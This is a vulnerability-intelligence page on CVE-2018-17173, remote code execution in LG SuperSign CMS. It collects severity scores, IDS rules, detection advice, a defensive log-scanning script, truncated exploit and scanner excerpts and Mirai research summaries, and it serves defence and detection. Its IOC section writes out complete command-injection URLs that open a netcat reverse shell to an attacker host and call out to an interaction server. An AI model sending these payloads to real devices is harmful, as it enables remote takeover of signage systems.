CVE-2018-17173
Published 2018-09-21
CVE-2018-17173: LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.
Priority P190 · critical · 9.8 (CVSS 3.0)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 56.24% (98.9th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lg | supersign_cms | — | — |
Detection & IOCs (extracted from sources)
url: /qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20<lhost>%20<lport>%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150
url: GET /qsr_server/device/getThumbnail?sourceUri=\'%2b-%253brm%2b/tmp/f%253bmkfifo%2b/tmp/f%253bcat%2b/tmp/f|/bin/sh%2b-i%2b2>%25261|curl%2bhttp%253a//{{interactsh-url}}%2b>/tmp/f%253b\';&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150 HTTP/1.1
snort:
alert http $EXTERNAL_NET any -> $HOME_NET 9080 (msg:"ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/qsrserver/device/getThumbnail?sourceUri=|22|"; startswith; fast_pattern; content:"|3b|"; within:40; content:"&targetUri="; distance:0; content:"&scaleType="; distance:0; reference:url,www.exploit-db.com/exploits/45448; reference:cve,2018-17173; classtype:attempted-admin; sid:2027089; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2018_17173, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, updated_at 2024_04_13;)
- Exploit traffic targets TCP port 9080, which is the fixed default port for LG SuperSignEZ CMS. Restrict or monitor inbound HTTP to this port.
- Detect GET requests to /qsr_server/device/getThumbnail (or /qsrserver/device/getThumbnail) containing a quote character in the sourceUri parameter followed by shell metacharacters (semicolons, pipe characters) and the &targetUri= and &scaleType= parameters.
- The Mirai variant exploiting this CVE is detected as IoT.Linux.MIRAI.VWISI and uses XOR key 0x04 to encrypt embedded credentials.
- Use FOFA query title="LG SuperSign" to identify exposed LG SuperSign CMS instances on the internet for asset discovery and attack surface reduction.
- Trend Micro DDI rule 2865 specifically covers this CVE: '2865 - CVE-2018-17173 LG Supersign Remote Code Execution - HTTP (Request)'.
- The exploit payload drops a named pipe at /tmp/f and spawns a reverse shell via /bin/sh piped through netcat. Monitor for creation of /tmp/f and anomalous netcat processes on LG WebOS-based devices.
- The Snort/Suricata rule (ET sid:2027089) uses /qsrserver/ (no underscore) in the URI content match, while the actual exploit path in PoC code uses /qsr_server/ (with underscore). Ensure your detection covers both variants.
- The Nuclei template uses an out-of-band interaction (interactsh) to confirm exploitation; it will not fire in environments without external DNS/HTTP callback visibility.
- The Metasploit module defaults to payload 'cmd/unix/reverse_netcat', requiring netcat to be present on the target. Actual attacker payloads may differ.
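The URI check described in the bullets above, as an added example (not code from any of the sources quoted on this page): it flags getThumbnail requests on either path spelling whose sourceUri, after repeated percent-decoding, contains a quote followed within 40 characters by `;` or `|`. The access-log format, the function names, the case-insensitive path match and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Both spellings seen on this page: the PoC path and the one in ET sid:2027089.
PATHS = {"/qsr_server/device/getthumbnail", "/qsrserver/device/getthumbnail"}
# A quote followed within 40 characters by ';' or '|' (mirrors the rule's within:40).
QUOTE_THEN_META = re.compile(r"""['"].{0,40}?[;|]""", re.DOTALL)
# Request line inside a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded %253b is seen as ';'."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_source_uri(target):
    """Return the decoded sourceUri if the request target matches, else None."""
    path, _, query = target.partition("?")
    if decode_fully(path).lower() not in PATHS:
        return None
    # Split on '&' before decoding so an encoded '&' in the value cannot split it.
    params = dict(p.partition("=")[::2] for p in query.split("&"))
    if not {"sourceUri", "targetUri", "scaleType"} <= params.keys():
        return None
    source = decode_fully(params["sourceUri"])
    return source if QUOTE_THEN_META.search(source) else None

def scan(lines):
    """Return (line number, decoded sourceUri) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        source = suspicious_source_uri(match.group(1)) if match else None
        if source is not None:
            hits.append((number, source))
    return hits

# Constructed sample lines: documentation IP ranges, harmless `id` as the command.
SAMPLE_LOG = """
192.0.2.10 - - [21/Sep/2018:10:00:00 +0000] "GET /qsr_server/device/getThumbnail?sourceUri=%2Fmedia%2Fphoto.jpg&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&scaleType=crop HTTP/1.1" 200 512
198.51.100.7 - - [21/Sep/2018:10:00:05 +0000] "GET /qsr_server/device/getThumbnail?sourceUri='%20-;id;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&scaleType=crop HTTP/1.1" 200 0
198.51.100.7 - - [21/Sep/2018:10:00:09 +0000] "GET /qsrserver/device/getThumbnail?sourceUri=%22%2b-%253bid%253b%22&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&scaleType=crop HTTP/1.1" 200 0
192.0.2.11 - - [21/Sep/2018:10:01:00 +0000] "GET /qsr_server/device/getThumbnail?sourceUri=%2Fmedia%2Fbob%27s.jpg&targetUri=%2Ftmp%2Fthumb%2Fb.jpg&scaleType=crop HTTP/1.1" 200 498
192.0.2.12 - - [21/Sep/2018:10:02:00 +0000] "GET /index.html?q=a;b HTTP/1.1" 200 1024
""".strip().splitlines()

if __name__ == "__main__":
    for number, source in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious sourceUri {source!r}")
```
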
CVSS provenance
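| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | | 9.8 | CRITICAL | |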
GHSA
GHSA-qgg8-99p6-v8v8: LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail
ghsa_unreviewed·2022-05-14
CVE-2018-17173 [CRITICAL] CWE-94 GHSA-qgg8-99p6-v8v8: LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail
VulnCheck
LG supersign_cms Improper Control of Generation of Code ('Code Injection')
vulncheck·2018·CVSS 9.8
CVE-2018-17173 [CRITICAL] LG supersign_cms Improper Control of Generation of Code ('Code Injection')
Affected: LG supersign_cms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/; https://www.akamai.com/blog/security/latest-echobot-26-infection-vectors; https://web.archive.org/web/20200319160240/https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/; https://www.trendmicro.com/en_us/research/20/g/new-
Suricata
ET EXPLOIT LG SuperSign EZ CMS 2.5 Remote Code Execution CVE-2018-17173
suricata·2020-06-11·CVSS 9.8
CVE-2018-17173 [CRITICAL] ET EXPLOIT LG SuperSign EZ CMS 2.5 Remote Code Execution CVE-2018-17173
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT LG SuperSign EZ CMS 2.5 Remote Code Execution CVE-2018-17173"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/qsr_server/device/getThumbnail?sourceUri="; fast_pattern; content:"'&targetUri="; distance:0; reference:url,www.exploit-db.com/exploits/45448; reference:cve,2018-17173; classtype:attempted-admin; sid:2030317; rev:3; metadata:affected_product Linux, attack_target IoT, created_at 2020_06_11, cve CVE_2018_17173, deployment Perimeter, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_07, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique
Suricata
ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)
suricata·2019-03-18·CVSS 9.8
CVE-2018-17173 [CRITICAL] ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET 9080 (msg:"ET EXPLOIT Possible LG SuperSign EZ CMS 2.5 RCE (CVE-2018-17173)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/qsrserver/device/getThumbnail?sourceUri=|22|"; startswith; fast_pattern; content:"|3b|"; within:40; content:"&targetUri="; distance:0; content:"&scaleType="; distance:0; reference:url,www.exploit-db.com/exploits/45448; reference:cve,2018-17173; classtype:attempted-admin; sid:2027089; rev:6; metadata:attack_target IoT, created_at 2019_03_18, cve CVE_2018_17173, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, updated_at 2024_04_13;)
Exploit-DB
LG Supersign EZ CMS - Remote Code Execution (Metasploit)
exploitdb·2019-05-06
CVE-2018-17173 LG Supersign EZ CMS - Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'LG Supersign EZ CMS RCE',
'Description' => %q{
LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone
to remote code execution due to an improper parameter handling
},
'Author' => ['Alejandro Fanjul'],
'References' =>
[
[ 'CVE', '2018-17173' ],
[ 'URL', 'https://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html']
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Privileged' => false,
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_netcat'
},
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd
Exploit-DB
LG SuperSign EZ CMS 2.5 - Remote Code Execution
exploitdb·2018-09-24·CVSS 9.8
CVE-2018-17173 [CRITICAL] LG SuperSign EZ CMS 2.5 - Remote Code Execution
---
# Exploit Title: LG SuperSign EZ CMS 2.5 - Remote Code Execution
# Date: 2018-09-18
# Exploit Author: Alejandro Fanjul
# Vendor Homepage:https://www.lg.com
# Software Link: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSignEZ 1.3
# Tested on: LG WebOS 3.10
# CVE : CVE-2018-17173
# 1. Description
# LG SuperSignEZ CMS, that many LG SuperSign TVs have built in, is prone
# to remote code execution due to an improper parameter handling
# 2. Proof of concept
# Code to exploit the vulnerability
import requests
from argparse import ArgumentParser
parser = ArgumentParser(description="SuperSign RCE")
parser.add_argument("-t", "--target", dest="target",
help="Target")
parser.add_argument("-l", "--lhost", dest="lhost",
help="lhost
Nuclei
LG Supersign EZ CMS - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-17173 [CRITICAL] LG Supersign EZ CMS - Remote Code Execution
LG Supersign EZ CMS - Remote Code Execution
Template:
id: CVE-2018-17173
info:
  name: LG Supersign EZ CMS - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    LG SuperSign CMS allows remote attackers to execute arbitrary code via the sourceUri parameter to qsr_server/device/getThumbnail.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands on LG SuperSign CMS servers via the sourceUri parameter, leading to complete server compromise and potential access to connected digital signage systems.
  remediation: |
    Upgrade to a patched version of LG SuperSign CMS that addresses CVE-2018-17173.
  reference:
    - http://mamaquieros
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
## Two New IoT Vulnerabilities Identified with Mirai Payloads
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While this generic approach allows researchers to observe the entire killchain and even acquire the malware binary from the attack, this post-exploitation heuristic does have its caveat: the traffic fingerprinting. Similar services yield similar traffi
Trendmicro
New Mirai Variant for Additional Vulnerabilities
blogs_trendmicro·2020-07-09·CVSS 8.8
CVE-2020-10173 [HIGH] New Mirai Variant for Additional Vulnerabilities
Malware
## New Mirai Variant for Additional Vulnerabilities
A new Mirai variant exploits nine vulnerabilities, some of which are affected for the first time.
By: Jemimah Molina, Augusto Remillano II Jul 09, 2020
Original post by Augusto Remillano II and Jemimah Molina
A new Mirai variant (IoT.Linux.MIRAI.VWISI) exploits nine vulnerabilities. The most notable of these is CVE-2020-10173 in Comtrend VR-3033 routers, because it was not affected by earlier Mirai variants. Most of the vulnerabilities this Mirai variant exploits consist of a combination of old and new, which helps to cast a wide net covering various types of connected devices. The nine vulnerabilities used in this campaign affect
Trendmicro
New Mirai Variant Expands, Exploits CVE-2020-1017
blogs_trendmicro·2020-07-08·CVSS 7.8
CVE-2020-10173 [HIGH] New Mirai Variant Expands, Exploits CVE-2020-1017
IoT
# New Mirai Variant Expands, Exploits CVE-2020-10173
We discovered a new Mirai variant that exploits nine vulnerabilities, most notable of which is CVE-2020-10173 in Comtrend VR-3033 routers which we have not observed exploited by past Mirai variants.
By: Augusto Remillano II, Jemimah Molina
2020/07/08
We discovered a new Mirai variant (detected as IoT.Linux.MIRAI.VWISI) that exploits nine vulnerabilities, most notable of which is CVE-2020-10173 in Comtrend VR-3033 routers which we have not observed exploited by past Mirai variants.
This discovery is a new addition to the Mirai variants that appeared in the past few months, that include SORA, UNSTABLE, and Mukashi. The case, however, showcases the ever-expanding arsenal of vulnerabilities new Mi
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Unit42
New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
blogs_unit42·2019-06-07·CVSS 9.8
[CRITICAL] New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Executive Summary
Palo Alto Networks Unit 42 has been tracking the evolution of the Mirai malware, known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016 when it took down several notable targets.
As part of this ongoing research, we’ve recently discovered a new variant of Mirai that has eight new exploits against a wide range of embedded devices. These newly targeted devices range from wireless presentation systems to set-top-boxes, SD-WANs, and even smart home controllers.
Mirai initially made use of default credentials to gain access to devices. However, since the end of 2017, samples of the family have increasingly been observed making use of publicly available exploits to propagate and run on vulnerable devices.
2018
Unit42
New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
blogs_unit42·2019-06-07·CVSS 9.8
CVE-2017-5174 [CRITICAL] New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
## New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices
Ruchna Nigam
Published: June 6, 2019
CVE-2017-5174
CVE-2018-11510
CVE-2018-17173
CVE-2018-6961
CVE-2019-2725
CVE-2019-3929
- http://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html
- http://packetstormsecurity.com/files/152733/LG-Supersign-EZ-CMS-Remote-Code-Execution.html
- https://www.exploit-db.com/exploits/45448/
- https://www.exploit-db.com/exploits/46795/
2018-09-21
Published
Exploited in the wild